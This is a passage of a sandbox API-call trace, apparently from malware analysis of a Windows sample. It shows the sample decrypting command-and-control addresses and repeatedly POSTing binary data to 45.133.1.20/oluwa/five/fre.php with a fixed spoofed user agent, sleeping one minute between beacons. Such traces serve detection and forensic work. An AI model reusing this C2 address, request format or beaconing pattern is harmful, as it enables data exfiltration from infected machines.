hHeap=0x6a0000) returned 1 [0294.088] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x181c) returned 0xafc [0294.090] Sleep (dwMilliseconds=0xea60) [0294.093] GetProcessHeap () returned 0x6a0000 [0294.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0294.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.094] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0294.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.103] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0294.116] GetProcessHeap () returned 0x6a0000 [0294.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0294.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.117] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0294.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.118] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0294.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.119] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.119] GetProcessHeap () returned 0x6a0000 [0294.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0294.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.121] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0294.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.124] CryptDestroyKey (hKey=0x6ad020) returned 1 [0294.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.175] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0294.175] GetProcessHeap () returned 0x6a0000 [0294.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0294.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.176] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0294.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.178] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0294.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.182] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0294.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.183] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0294.183] GetProcessHeap () returned 0x6a0000 [0294.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0294.183] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0294.184] GetProcessHeap () returned 0x6a0000 [0294.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0294.184] GetProcessHeap () returned 0x6a0000 [0294.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0294.185] GetProcessHeap () returned 0x6a0000 [0294.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0294.186] GetProcessHeap () returned 0x6a0000 [0294.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0294.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.190] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0294.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.198] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0294.209] GetProcessHeap () returned 0x6a0000 [0294.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0294.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.211] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0294.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.214] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0294.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.215] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.215] GetProcessHeap () returned 0x6a0000 [0294.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0294.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.217] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0294.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.219] CryptDestroyKey (hKey=0x6ad020) returned 1 [0294.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.220] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0294.220] GetProcessHeap () returned 0x6a0000 [0294.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0294.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.221] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0294.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.223] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0294.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.224] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0294.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.225] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0294.225] GetProcessHeap () returned 0x6a0000 [0294.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0294.225] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0294.226] GetProcessHeap () returned 0x6a0000 [0294.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0294.226] socket (af=2, type=1, protocol=6) returned 0xb00 [0294.226] connect (s=0xb00, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0294.253] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0294.253] GetProcessHeap () returned 0x6a0000 [0294.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0294.253] GetProcessHeap () returned 0x6a0000 [0294.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0294.260] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0294.261] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0294.262] GetProcessHeap () returned 0x6a0000 [0294.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db0c8 [0294.262] GetProcessHeap () returned 0x6a0000 [0294.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0294.263] GetProcessHeap () returned 0x6a0000 [0294.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0294.263] GetProcessHeap () returned 0x6a0000 [0294.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0294.264] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0294.265] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0294.265] GetProcessHeap () returned 0x6a0000 [0294.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0294.265] GetProcessHeap () returned 0x6a0000 [0294.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0294.266] send (s=0xb00, buf=0x6bd460*, len=242, flags=0) returned 242 [0294.267] send (s=0xb00, buf=0x6bb998*, len=159, flags=0) returned 159 [0294.267] GetProcessHeap () returned 0x6a0000 [0294.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0294.267] recv (in: s=0xb00, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0294.355] GetProcessHeap () returned 0x6a0000 [0294.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0294.358] GetProcessHeap () returned 0x6a0000 [0294.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0294.359] GetProcessHeap () returned 0x6a0000 [0294.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db0c8 | out: hHeap=0x6a0000) returned 1 [0294.359] GetProcessHeap () returned 0x6a0000 [0294.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0294.360] closesocket (s=0xb00) returned 0 [0294.361] GetProcessHeap () returned 0x6a0000 [0294.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0294.361] GetProcessHeap () returned 0x6a0000 [0294.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0294.361] GetProcessHeap () returned 0x6a0000 [0294.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0294.362] GetProcessHeap () returned 0x6a0000 [0294.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0294.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1820) returned 0xb00 [0294.364] Sleep (dwMilliseconds=0xea60) [0294.366] GetProcessHeap () returned 0x6a0000 [0294.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0294.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.368] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0294.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.376] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0294.384] GetProcessHeap () returned 0x6a0000 [0294.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0294.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.385] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0294.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.387] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0294.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.388] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.388] GetProcessHeap () returned 0x6a0000 [0294.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0294.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.390] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0294.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.392] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0294.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.393] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0294.393] GetProcessHeap () returned 0x6a0000 [0294.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0294.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.419] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0294.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.432] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0294.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.434] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0294.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.435] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0294.435] GetProcessHeap () returned 0x6a0000 [0294.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0294.435] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0294.436] GetProcessHeap () returned 0x6a0000 [0294.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0294.437] GetProcessHeap () returned 0x6a0000 [0294.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0294.437] GetProcessHeap () returned 0x6a0000 [0294.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0294.438] GetProcessHeap () returned 0x6a0000 [0294.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0294.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.439] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0294.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.449] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0294.458] GetProcessHeap () returned 0x6a0000 [0294.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0294.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.459] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0294.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.460] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0294.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.461] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.461] GetProcessHeap () returned 0x6a0000 [0294.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0294.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.462] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0294.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.463] CryptDestroyKey (hKey=0x6ad520) returned 1 [0294.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.466] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0294.467] GetProcessHeap () returned 0x6a0000 [0294.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0294.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.468] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0294.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.469] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0294.470] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.471] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0294.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.472] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0294.472] GetProcessHeap () returned 0x6a0000 [0294.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0294.472] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0294.472] GetProcessHeap () returned 0x6a0000 [0294.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0294.472] socket (af=2, type=1, protocol=6) returned 0xb04 [0294.472] connect (s=0xb04, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0294.534] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0294.534] GetProcessHeap () returned 0x6a0000 [0294.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0294.534] GetProcessHeap () returned 0x6a0000 [0294.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0294.544] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0294.545] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0294.545] GetProcessHeap () returned 0x6a0000 [0294.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6daf48 [0294.545] GetProcessHeap () returned 0x6a0000 [0294.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0294.546] GetProcessHeap () returned 0x6a0000 [0294.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0294.546] GetProcessHeap () returned 0x6a0000 [0294.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0294.547] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0294.548] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0294.548] GetProcessHeap () returned 0x6a0000 [0294.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0294.548] GetProcessHeap () returned 0x6a0000 [0294.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0294.548] send (s=0xb04, buf=0x6bd460*, len=242, flags=0) returned 242 [0294.551] send (s=0xb04, buf=0x6bb998*, len=159, flags=0) returned 159 [0294.551] GetProcessHeap () returned 0x6a0000 [0294.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0294.551] recv (in: s=0xb04, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0294.616] GetProcessHeap () returned 0x6a0000 [0294.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0294.616] GetProcessHeap () returned 0x6a0000 [0294.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0294.616] GetProcessHeap () returned 0x6a0000 [0294.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf48 | out: hHeap=0x6a0000) returned 1 [0294.617] GetProcessHeap () returned 0x6a0000 [0294.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0294.617] closesocket (s=0xb04) returned 0 [0294.618] GetProcessHeap () returned 0x6a0000 [0294.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0294.618] GetProcessHeap () returned 0x6a0000 [0294.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0294.622] GetProcessHeap () returned 0x6a0000 [0294.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0294.622] GetProcessHeap () returned 0x6a0000 [0294.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0294.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1824) returned 0xb04 [0294.638] Sleep (dwMilliseconds=0xea60) [0294.639] GetProcessHeap () returned 0x6a0000 [0294.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0294.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.641] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0294.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.646] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0294.652] 